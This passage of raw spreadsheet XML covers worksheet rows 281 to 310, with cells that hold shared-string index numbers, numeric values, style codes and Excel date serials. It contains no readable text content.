      <c r="P281" t="s">
        <v>1038</v>
      </c>
      <c r="Q281" s="95" t="s">
        <v>1040</v>
      </c>
      <c r="W281" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="282" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A282" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B282" s="52"/>
      <c r="C282" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D282" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E282" s="95" t="s">
        <v>1041</v>
      </c>
      <c r="F282" s="42">
        <v>200</v>
      </c>
      <c r="G282" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H282" t="s">
        <v>1042</v>
      </c>
      <c r="I282" t="s">
        <v>103</v>
      </c>
      <c r="J282" s="95" t="s">
        <v>32</v>
      </c>
      <c r="K282" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L282" t="s">
        <v>77</v>
      </c>
      <c r="M282" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P282" t="s">
        <v>1043</v>
      </c>
      <c r="Q282" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W282" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="283" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A283" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B283" s="52"/>
      <c r="C283" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D283" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E283" s="95" t="s">
        <v>1044</v>
      </c>
      <c r="F283" s="42">
        <v>110</v>
      </c>
      <c r="G283" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H283" t="s">
        <v>1045</v>
      </c>
      <c r="K283" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L283" t="s">
        <v>38</v>
      </c>
      <c r="M283" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N283" t="s">
        <v>38</v>
      </c>
      <c r="P283" t="s">
        <v>1046</v>
      </c>
      <c r="Q283" s="95" t="s">
        <v>1047</v>
      </c>
      <c r="W283" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="284" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A284" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B284" s="52"/>
      <c r="C284" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D284" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E284" s="95" t="s">
        <v>1048</v>
      </c>
      <c r="F284" s="42">
        <v>100</v>
      </c>
      <c r="G284" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H284" t="s">
        <v>1049</v>
      </c>
      <c r="I284" t="s">
        <v>103</v>
      </c>
      <c r="J284" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K284" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L284" t="s">
        <v>77</v>
      </c>
      <c r="M284" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P284" t="s">
        <v>567</v>
      </c>
      <c r="Q284" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W284" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="285" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A285" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B285" s="52">
        <v>44714.405140173614</v>
      </c>
      <c r="C285" s="95" t="s">
        <v>1050</v>
      </c>
      <c r="D285" s="96">
        <v>100</v>
      </c>
      <c r="E285" s="95" t="s">
        <v>1051</v>
      </c>
      <c r="F285" s="42">
        <v>100</v>
      </c>
      <c r="G285" s="95" t="s">
        <v>1052</v>
      </c>
      <c r="H285" t="s">
        <v>1053</v>
      </c>
      <c r="Q285" s="95" t="s">
        <v>1054</v>
      </c>
      <c r="U285">
        <v>6</v>
      </c>
      <c r="W285" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="286" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A286" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B286" s="52">
        <v>44449.5567537963</v>
      </c>
      <c r="C286" s="95" t="s">
        <v>1055</v>
      </c>
      <c r="D286" s="96">
        <v>111</v>
      </c>
      <c r="E286" s="95" t="s">
        <v>1056</v>
      </c>
      <c r="F286" s="42">
        <v>111</v>
      </c>
      <c r="G286" s="95" t="s">
        <v>1057</v>
      </c>
      <c r="H286" t="s">
        <v>1058</v>
      </c>
      <c r="I286" t="s">
        <v>268</v>
      </c>
      <c r="J286" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K286" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L286" t="s">
        <v>77</v>
      </c>
      <c r="M286" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N286" t="s">
        <v>623</v>
      </c>
      <c r="O286" s="95" t="s">
        <v>1059</v>
      </c>
      <c r="Q286" s="95" t="s">
        <v>1060</v>
      </c>
      <c r="R286">
        <v>2</v>
      </c>
      <c r="T286">
        <v>21669</v>
      </c>
      <c r="U286">
        <v>10135</v>
      </c>
      <c r="V286">
        <v>5891</v>
      </c>
      <c r="W286" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="287" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A287" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B287" s="52">
        <v>44704.690373680554</v>
      </c>
      <c r="C287" s="95" t="s">
        <v>1055</v>
      </c>
      <c r="D287" s="96">
        <v>200</v>
      </c>
      <c r="E287" s="95" t="s">
        <v>1056</v>
      </c>
      <c r="F287" s="42">
        <v>200</v>
      </c>
      <c r="G287" s="95" t="s">
        <v>1057</v>
      </c>
      <c r="H287" t="s">
        <v>1058</v>
      </c>
      <c r="I287" t="s">
        <v>268</v>
      </c>
      <c r="J287" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K287" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L287" t="s">
        <v>77</v>
      </c>
      <c r="M287" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N287" t="s">
        <v>623</v>
      </c>
      <c r="O287" s="95" t="s">
        <v>1059</v>
      </c>
      <c r="Q287" s="95" t="s">
        <v>1061</v>
      </c>
      <c r="R287">
        <v>2</v>
      </c>
      <c r="T287">
        <v>21669</v>
      </c>
      <c r="U287">
        <v>10135</v>
      </c>
      <c r="V287">
        <v>5891</v>
      </c>
      <c r="W287" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="288" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A288" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B288" s="52">
        <v>44443.409976168979</v>
      </c>
      <c r="C288" s="95" t="s">
        <v>1062</v>
      </c>
      <c r="D288" s="96">
        <v>120</v>
      </c>
      <c r="E288" s="95" t="s">
        <v>1063</v>
      </c>
      <c r="F288" s="42">
        <v>101</v>
      </c>
      <c r="G288" s="95" t="s">
        <v>1064</v>
      </c>
      <c r="H288" t="s">
        <v>1065</v>
      </c>
      <c r="I288" t="s">
        <v>179</v>
      </c>
      <c r="J288" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K288" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L288" t="s">
        <v>77</v>
      </c>
      <c r="M288" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O288" s="95" t="s">
        <v>1067</v>
      </c>
      <c r="Q288" s="95" t="s">
        <v>1068</v>
      </c>
      <c r="R288">
        <v>15</v>
      </c>
      <c r="S288">
        <v>3</v>
      </c>
      <c r="T288">
        <v>21</v>
      </c>
      <c r="U288">
        <v>7</v>
      </c>
      <c r="V288">
        <v>19</v>
      </c>
      <c r="W288" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="289" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A289" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B289" s="52">
        <v>44446.776413738429</v>
      </c>
      <c r="C289" s="95" t="s">
        <v>1062</v>
      </c>
      <c r="D289" s="96">
        <v>120</v>
      </c>
      <c r="E289" s="95" t="s">
        <v>1069</v>
      </c>
      <c r="F289" s="42">
        <v>101</v>
      </c>
      <c r="G289" s="95" t="s">
        <v>1070</v>
      </c>
      <c r="H289" t="s">
        <v>1071</v>
      </c>
      <c r="I289" t="s">
        <v>179</v>
      </c>
      <c r="J289" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K289" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L289" t="s">
        <v>77</v>
      </c>
      <c r="M289" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="Q289" s="95" t="s">
        <v>1068</v>
      </c>
      <c r="R289">
        <v>4966</v>
      </c>
      <c r="S289">
        <v>8674</v>
      </c>
      <c r="T289">
        <v>5118</v>
      </c>
      <c r="U289">
        <v>5397</v>
      </c>
      <c r="V289">
        <v>4035</v>
      </c>
      <c r="W289" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="290" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A290" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B290" s="52">
        <v>44446.77641377315</v>
      </c>
      <c r="C290" s="95" t="s">
        <v>1062</v>
      </c>
      <c r="D290" s="96">
        <v>120</v>
      </c>
      <c r="E290" s="95" t="s">
        <v>1072</v>
      </c>
      <c r="F290" s="42">
        <v>200</v>
      </c>
      <c r="G290" s="95" t="s">
        <v>1073</v>
      </c>
      <c r="H290" t="s">
        <v>1074</v>
      </c>
      <c r="I290" t="s">
        <v>179</v>
      </c>
      <c r="J290" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K290" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L290" t="s">
        <v>77</v>
      </c>
      <c r="M290" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="Q290" s="95" t="s">
        <v>1068</v>
      </c>
      <c r="V290">
        <v>38</v>
      </c>
      <c r="W290" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="291" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A291" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B291" s="52">
        <v>44446.77641377315</v>
      </c>
      <c r="C291" s="95" t="s">
        <v>1062</v>
      </c>
      <c r="D291" s="96">
        <v>120</v>
      </c>
      <c r="E291" s="95" t="s">
        <v>1075</v>
      </c>
      <c r="F291" s="42">
        <v>100</v>
      </c>
      <c r="G291" s="95" t="s">
        <v>1076</v>
      </c>
      <c r="H291" t="s">
        <v>1077</v>
      </c>
      <c r="I291" t="s">
        <v>179</v>
      </c>
      <c r="J291" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K291" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L291" t="s">
        <v>77</v>
      </c>
      <c r="M291" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="Q291" s="95" t="s">
        <v>1068</v>
      </c>
      <c r="V291">
        <v>33</v>
      </c>
      <c r="W291" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="292" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A292" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B292" s="52">
        <v>44405.437080625001</v>
      </c>
      <c r="C292" s="95" t="s">
        <v>1078</v>
      </c>
      <c r="D292" s="96">
        <v>200</v>
      </c>
      <c r="E292" s="95" t="s">
        <v>1079</v>
      </c>
      <c r="F292" s="42">
        <v>112</v>
      </c>
      <c r="G292" s="95" t="s">
        <v>1080</v>
      </c>
      <c r="H292" t="s">
        <v>1081</v>
      </c>
      <c r="I292" t="s">
        <v>179</v>
      </c>
      <c r="J292" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K292" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L292" t="s">
        <v>77</v>
      </c>
      <c r="M292" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O292" s="95" t="s">
        <v>1082</v>
      </c>
      <c r="Q292" s="95" t="s">
        <v>1083</v>
      </c>
      <c r="W292" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="293" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A293" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B293" s="52">
        <v>44405.437080717595</v>
      </c>
      <c r="C293" s="95" t="s">
        <v>1078</v>
      </c>
      <c r="D293" s="96">
        <v>200</v>
      </c>
      <c r="E293" s="95" t="s">
        <v>1084</v>
      </c>
      <c r="F293" s="42">
        <v>200</v>
      </c>
      <c r="G293" s="95" t="s">
        <v>1085</v>
      </c>
      <c r="H293" t="s">
        <v>1086</v>
      </c>
      <c r="I293" t="s">
        <v>179</v>
      </c>
      <c r="J293" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K293" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L293" t="s">
        <v>77</v>
      </c>
      <c r="M293" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O293" s="95" t="s">
        <v>1087</v>
      </c>
      <c r="Q293" s="95" t="s">
        <v>1083</v>
      </c>
      <c r="W293" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="294" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A294" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B294" s="52">
        <v>44405.437080671298</v>
      </c>
      <c r="C294" s="95" t="s">
        <v>1078</v>
      </c>
      <c r="D294" s="96">
        <v>200</v>
      </c>
      <c r="E294" s="95" t="s">
        <v>1084</v>
      </c>
      <c r="F294" s="42">
        <v>112</v>
      </c>
      <c r="G294" s="95" t="s">
        <v>1085</v>
      </c>
      <c r="H294" t="s">
        <v>1086</v>
      </c>
      <c r="I294" t="s">
        <v>179</v>
      </c>
      <c r="J294" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K294" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L294" t="s">
        <v>77</v>
      </c>
      <c r="M294" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O294" s="95" t="s">
        <v>1087</v>
      </c>
      <c r="Q294" s="95" t="s">
        <v>1083</v>
      </c>
      <c r="W294" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="295" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A295" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B295" s="52"/>
      <c r="C295" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D295" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E295" s="95" t="s">
        <v>1088</v>
      </c>
      <c r="F295" s="42">
        <v>100</v>
      </c>
      <c r="G295" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H295" t="s">
        <v>1089</v>
      </c>
      <c r="I295" t="s">
        <v>103</v>
      </c>
      <c r="J295" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K295" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L295" t="s">
        <v>77</v>
      </c>
      <c r="M295" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P295" t="s">
        <v>772</v>
      </c>
      <c r="Q295" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W295" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="296" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A296" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B296" s="52"/>
      <c r="C296" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D296" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E296" s="95" t="s">
        <v>1090</v>
      </c>
      <c r="F296" s="42">
        <v>100</v>
      </c>
      <c r="G296" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H296" t="s">
        <v>1091</v>
      </c>
      <c r="I296" t="s">
        <v>196</v>
      </c>
      <c r="J296" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K296" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L296" t="s">
        <v>77</v>
      </c>
      <c r="M296" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N296" t="s">
        <v>198</v>
      </c>
      <c r="P296" t="s">
        <v>1092</v>
      </c>
      <c r="Q296" s="95" t="s">
        <v>1093</v>
      </c>
      <c r="W296" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="297" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A297" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B297" s="52">
        <v>44313.446493738425</v>
      </c>
      <c r="C297" s="95" t="s">
        <v>1094</v>
      </c>
      <c r="D297" s="96">
        <v>100</v>
      </c>
      <c r="E297" s="95" t="s">
        <v>1095</v>
      </c>
      <c r="F297" s="42">
        <v>100</v>
      </c>
      <c r="G297" s="95" t="s">
        <v>1096</v>
      </c>
      <c r="H297" t="s">
        <v>1097</v>
      </c>
      <c r="I297" t="s">
        <v>611</v>
      </c>
      <c r="J297" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K297" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L297" t="s">
        <v>77</v>
      </c>
      <c r="M297" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N297" t="s">
        <v>1098</v>
      </c>
      <c r="Q297" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W297" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="298" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A298" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B298" s="52">
        <v>44068.684262800925</v>
      </c>
      <c r="C298" s="95" t="s">
        <v>1099</v>
      </c>
      <c r="D298" s="96">
        <v>100</v>
      </c>
      <c r="E298" s="95" t="s">
        <v>1100</v>
      </c>
      <c r="F298" s="42">
        <v>100</v>
      </c>
      <c r="G298" s="95" t="s">
        <v>1101</v>
      </c>
      <c r="H298" t="s">
        <v>1102</v>
      </c>
      <c r="I298" t="s">
        <v>103</v>
      </c>
      <c r="J298" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K298" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L298" t="s">
        <v>83</v>
      </c>
      <c r="M298" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N298" t="s">
        <v>149</v>
      </c>
      <c r="O298" s="95" t="s">
        <v>1103</v>
      </c>
      <c r="Q298" s="95" t="s">
        <v>1104</v>
      </c>
      <c r="T298">
        <v>2</v>
      </c>
      <c r="W298" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="299" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A299" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B299" s="52"/>
      <c r="C299" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D299" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E299" s="95" t="s">
        <v>1105</v>
      </c>
      <c r="F299" s="42">
        <v>200</v>
      </c>
      <c r="G299" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H299" t="s">
        <v>1106</v>
      </c>
      <c r="I299" t="s">
        <v>103</v>
      </c>
      <c r="J299" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K299" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L299" t="s">
        <v>77</v>
      </c>
      <c r="M299" s="95" t="s">
        <v>104</v>
      </c>
      <c r="Q299" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W299" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="300" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A300" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B300" s="52">
        <v>44474.595500729163</v>
      </c>
      <c r="C300" s="95" t="s">
        <v>1107</v>
      </c>
      <c r="D300" s="96">
        <v>101</v>
      </c>
      <c r="E300" s="95" t="s">
        <v>1108</v>
      </c>
      <c r="F300" s="42">
        <v>101</v>
      </c>
      <c r="G300" s="95" t="s">
        <v>1109</v>
      </c>
      <c r="H300" t="s">
        <v>1110</v>
      </c>
      <c r="I300" t="s">
        <v>179</v>
      </c>
      <c r="J300" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K300" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L300" t="s">
        <v>77</v>
      </c>
      <c r="M300" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="Q300" s="95" t="s">
        <v>1111</v>
      </c>
      <c r="R300">
        <v>2980</v>
      </c>
      <c r="S300">
        <v>2782</v>
      </c>
      <c r="T300">
        <v>2435</v>
      </c>
      <c r="U300">
        <v>2131</v>
      </c>
      <c r="V300">
        <v>3708</v>
      </c>
      <c r="W300" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="301" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A301" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B301" s="52"/>
      <c r="C301" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D301" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E301" s="95" t="s">
        <v>1112</v>
      </c>
      <c r="F301" s="42">
        <v>100</v>
      </c>
      <c r="G301" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H301" t="s">
        <v>1113</v>
      </c>
      <c r="I301" t="s">
        <v>196</v>
      </c>
      <c r="J301" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K301" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L301" t="s">
        <v>77</v>
      </c>
      <c r="M301" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N301" t="s">
        <v>198</v>
      </c>
      <c r="P301" t="s">
        <v>1114</v>
      </c>
      <c r="Q301" s="95" t="s">
        <v>991</v>
      </c>
      <c r="W301" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="302" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A302" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B302" s="52">
        <v>44007.689696863425</v>
      </c>
      <c r="C302" s="95" t="s">
        <v>1115</v>
      </c>
      <c r="D302" s="96">
        <v>103</v>
      </c>
      <c r="E302" s="95" t="s">
        <v>1116</v>
      </c>
      <c r="F302" s="42">
        <v>102</v>
      </c>
      <c r="G302" s="95" t="s">
        <v>1117</v>
      </c>
      <c r="H302" t="s">
        <v>1118</v>
      </c>
      <c r="I302" t="s">
        <v>103</v>
      </c>
      <c r="J302" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K302" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L302" t="s">
        <v>77</v>
      </c>
      <c r="M302" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O302" s="95" t="s">
        <v>1119</v>
      </c>
      <c r="Q302" s="95" t="s">
        <v>1120</v>
      </c>
      <c r="R302">
        <v>737</v>
      </c>
      <c r="S302">
        <v>686</v>
      </c>
      <c r="W302" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="303" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A303" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B303" s="52">
        <v>44145.687615787036</v>
      </c>
      <c r="C303" s="95" t="s">
        <v>1121</v>
      </c>
      <c r="D303" s="96">
        <v>100</v>
      </c>
      <c r="E303" s="95" t="s">
        <v>1122</v>
      </c>
      <c r="F303" s="42">
        <v>100</v>
      </c>
      <c r="G303" s="95" t="s">
        <v>1123</v>
      </c>
      <c r="H303" t="s">
        <v>1124</v>
      </c>
      <c r="I303" t="s">
        <v>103</v>
      </c>
      <c r="J303" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K303" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L303" t="s">
        <v>83</v>
      </c>
      <c r="M303" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N303" t="s">
        <v>1125</v>
      </c>
      <c r="O303" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q303" s="95" t="s">
        <v>1126</v>
      </c>
      <c r="R303">
        <v>6071</v>
      </c>
      <c r="S303">
        <v>5132</v>
      </c>
      <c r="T303">
        <v>6178</v>
      </c>
      <c r="U303">
        <v>8587</v>
      </c>
      <c r="V303">
        <v>13047</v>
      </c>
      <c r="W303" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="304" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A304" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B304" s="52"/>
      <c r="C304" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D304" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E304" s="95" t="s">
        <v>1127</v>
      </c>
      <c r="F304" s="42">
        <v>100</v>
      </c>
      <c r="G304" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H304" t="s">
        <v>1128</v>
      </c>
      <c r="I304" t="s">
        <v>196</v>
      </c>
      <c r="J304" s="95" t="s">
        <v>722</v>
      </c>
      <c r="K304" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L304" t="s">
        <v>77</v>
      </c>
      <c r="M304" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N304" t="s">
        <v>198</v>
      </c>
      <c r="P304" t="s">
        <v>723</v>
      </c>
      <c r="Q304" s="95" t="s">
        <v>725</v>
      </c>
      <c r="W304" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="305" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A305" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B305" s="52"/>
      <c r="C305" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D305" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E305" s="95" t="s">
        <v>1129</v>
      </c>
      <c r="F305" s="42">
        <v>100</v>
      </c>
      <c r="G305" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H305" t="s">
        <v>1130</v>
      </c>
      <c r="I305" t="s">
        <v>196</v>
      </c>
      <c r="J305" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K305" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L305" t="s">
        <v>77</v>
      </c>
      <c r="M305" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N305" t="s">
        <v>198</v>
      </c>
      <c r="Q305" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W305" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="306" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A306" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B306" s="52"/>
      <c r="C306" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D306" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E306" s="95" t="s">
        <v>1131</v>
      </c>
      <c r="F306" s="42">
        <v>100</v>
      </c>
      <c r="G306" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H306" t="s">
        <v>1132</v>
      </c>
      <c r="I306" t="s">
        <v>156</v>
      </c>
      <c r="J306" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K306" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L306" t="s">
        <v>77</v>
      </c>
      <c r="M306" s="95" t="s">
        <v>227</v>
      </c>
      <c r="N306" t="s">
        <v>228</v>
      </c>
      <c r="Q306" s="95" t="s">
        <v>1133</v>
      </c>
      <c r="W306" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="307" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A307" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B307" s="52"/>
      <c r="C307" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D307" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E307" s="95" t="s">
        <v>1134</v>
      </c>
      <c r="F307" s="42">
        <v>100</v>
      </c>
      <c r="G307" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H307" t="s">
        <v>1135</v>
      </c>
      <c r="I307" t="s">
        <v>103</v>
      </c>
      <c r="J307" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K307" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L307" t="s">
        <v>77</v>
      </c>
      <c r="M307" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P307" t="s">
        <v>772</v>
      </c>
      <c r="Q307" s="95" t="s">
        <v>1136</v>
      </c>
      <c r="W307" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="308" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A308" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B308" s="52"/>
      <c r="C308" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D308" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E308" s="95" t="s">
        <v>1137</v>
      </c>
      <c r="F308" s="42">
        <v>100</v>
      </c>
      <c r="G308" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H308" t="s">
        <v>1138</v>
      </c>
      <c r="I308" t="s">
        <v>75</v>
      </c>
      <c r="J308" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K308" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L308" t="s">
        <v>77</v>
      </c>
      <c r="M308" s="95" t="s">
        <v>76</v>
      </c>
      <c r="P308" t="s">
        <v>78</v>
      </c>
      <c r="Q308" s="95" t="s">
        <v>396</v>
      </c>
      <c r="W308" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="309" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A309" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B309" s="52"/>
      <c r="C309" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D309" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E309" s="95" t="s">
        <v>1139</v>
      </c>
      <c r="F309" s="42">
        <v>100</v>
      </c>
      <c r="G309" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H309" t="s">
        <v>1140</v>
      </c>
      <c r="I309" t="s">
        <v>75</v>
      </c>
      <c r="J309" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K309" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L309" t="s">
        <v>77</v>
      </c>
      <c r="M309" s="95" t="s">
        <v>76</v>
      </c>
      <c r="P309" t="s">
        <v>78</v>
      </c>
      <c r="Q309" s="95" t="s">
        <v>396</v>
      </c>
      <c r="W309" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="310" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A310" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B310" s="52"/>
      <c r="C310" s="95" t="s">
        <v>72</v>
      </c>
